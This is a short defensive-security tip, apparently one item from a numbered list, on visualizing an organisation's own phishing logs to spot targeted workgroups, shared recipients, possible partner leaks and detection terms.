  • #34 Visualize Your own logs from Phishing campaigns, bucketing for work groups, M&A activity, projects people are on. Collecting data for who the recipients are for phishing emails can begin to show you relationships, especially if you use a visualization tool such as i2 analysts notebook, Splunk, or on the free side, an ELK stack. Are there common recipients between campaigns, does this happen often, are they in the same workgroup, are they working on a deal with the same external customer, could that customer have had a breach causing a leak of emails, or is that customer possibly doing their own recon? It has been known to happen A word cloud will be weighted to show the most common terms as larger, and can be valuable for showing any common items that could be used for detection, or just to know trends. This can be valuable not only for real phishing, but for phishing training to know what your employees are more susceptible to